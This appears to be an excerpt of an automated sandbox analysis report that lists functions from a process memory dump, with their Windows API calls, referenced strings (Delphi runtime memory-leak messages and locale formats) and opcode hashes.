                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Version
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1889659487-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 96eec355c90f8f6c61efeb783bac99f356616a7189c674a83f81a8ad68dc8e12
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f12913477d779db2b36cc99047b7e094cb371106bf3faac5cfc28672dd5d19ba
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96eec355c90f8f6c61efeb783bac99f356616a7189c674a83f81a8ad68dc8e12
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EAF09D74945302DFE394DF68D541A16B7E9FB49B94F808D29EA9887380EB38D8148B62
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AFA810 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02AFBE72,00000000,02AFC08B,?,?,00000000,00000000), ref: 02AFA823
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: bd73d255b4ca6d87a83bd6daad4beefc4eb87175e179c628966e1357264fcc68
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53D05EA230E2602AA254919A2D84DBB5AECCAC57A1F00403ABA8CC6102D7488C07DAF1
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AF920C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: LocalTime
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 481472006-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 139a25f02656b0c24a015d34eff7f3405fde979bba16051863c10ffcf33777d5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EDA012404448204185C033180C0253430445810F20FC4874078F8442D0EE1E01208193
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AFC98E Relevance: .3, Instructions: 295COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a58bf0130cd5a8d90b7d8c4960857e5c1fdc633213b216a89359a2e5990c6582
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 45a1339b25c54f37ee34587a9b7ca309c696d95d24a583acc3859493bf5e89b9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a58bf0130cd5a8d90b7d8c4960857e5c1fdc633213b216a89359a2e5990c6582
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2FB15C91A4D7C49FC3635B74887228B3F719F63300B9A44C7D2D48F6A3D90D991ACBA6
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AFC9DE Relevance: .3, Instructions: 285COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5f985d7653e47d864867e917fe95d54f5a41e29cd18467577902bf68d63cff66
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 751a18a14382f9d731ebc19fb82871ceb4300a93f11f977d256067be7c91129d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f985d7653e47d864867e917fe95d54f5a41e29cd18467577902bf68d63cff66
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32A12C91A4E7C09FC3535B74887228B3F719F67300B9A44C7D2D48F6A3D90C991ACBA6
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AF20C4 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AFD294 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02AFD29D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AFD268: GetProcAddress.KERNEL32(00000000), ref: 02AFD281
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1646373207-1918263038
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a5ae92c521bec13c9297b3dcd214c4333b3d7173ed6d77b9cf61637838bfbcda
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 33e2af5000e504ee8adeafbb610405c655700925a564a811c4fe56e11e81f7e5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5ae92c521bec13c9297b3dcd214c4333b3d7173ed6d77b9cf61637838bfbcda
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D415070AC8B085BD286ABEE7500427F7DED265B503A0451AF354CB780EE3CFC459E69
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B06ED8 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02B06EDE
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02B06EEF
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02B06EFF
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02B06F0F
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02B06F1F
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02B06F2F
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02B06F3F
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 667068680-2233174745
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 48dad04ecb049da0c2bbb93c63b3ac4dbed26661aa696d9c306440a36deb9ef6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b7380740caccfdcd492d6eece31811cd5c448fe412e51c8cc0beec6bf9696687
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48dad04ecb049da0c2bbb93c63b3ac4dbed26661aa696d9c306440a36deb9ef6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FF04CE0AD93406DBBC5BBB05EC18262F9DA760A843401C95BE22565D2EEBDD434CF10
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AF2530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02AF28CE
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2030045667-32948583
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b4aab5dc140237924f86f434280a637e587cb7e707cddc110d2dc1973b64109d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 61ef4d242cf2f23a7fa3611292f29e281dcbbdf70e87badc794fed3de324a5cd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4aab5dc140237924f86f434280a637e587cb7e707cddc110d2dc1973b64109d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DA1D330A042548BDBA1ABACCCC0BD9B6F5EB09354F1440E5FE49AB285CF7D9989CF51
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AF252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          • The unexpected small block leaks are:, xrefs: 02AF2707
                                                                                                                                                                                                                                                                                                                                                                                                                          • , xrefs: 02AF2814
                                                                                                                                                                                                                                                                                                                                                                                                                          • Unexpected Memory Leak, xrefs: 02AF28C0
                                                                                                                                                                                                                                                                                                                                                                                                                          • 7, xrefs: 02AF26A1
                                                                                                                                                                                                                                                                                                                                                                                                                          • An unexpected memory leak has occurred. , xrefs: 02AF2690
                                                                                                                                                                                                                                                                                                                                                                                                                          • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02AF2849
                                                                                                                                                                                                                                                                                                                                                                                                                          • bytes: , xrefs: 02AF275D
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 0-2723507874
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 69020be591c8b012081141a90dff1bda404ba5bfa846072741b3194bc7278413
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3b6c77fd1d7e2ae3f818840aa1b904e55376a9dc09748821cf9986f9ae7be892
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69020be591c8b012081141a90dff1bda404ba5bfa846072741b3194bc7278413
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F971A230A042988FDBA19BACCCC4BD9BAF5EB09744F1040E5FA499B281DF794985CF51
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AFBDC0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000000,02AFC08B,?,?,00000000,00000000), ref: 02AFBDF6
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AFA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02AFA7E2
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Locale$InfoThread
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4232894706-2493093252
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ef0621c2ebb5aebc363d0ca4adf7c092c1c1c7eb015fc54efbdadc45bf3a9682
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4ae419e44c9327198db2add84f2de5114ab883d5e184e5da55707ac0a18dc962
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef0621c2ebb5aebc363d0ca4adf7c092c1c1c7eb015fc54efbdadc45bf3a9682
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E615034B401489BDB80EBE5D990ADF77BB9B88700F508836B3019B645DE3DDD1A8F91
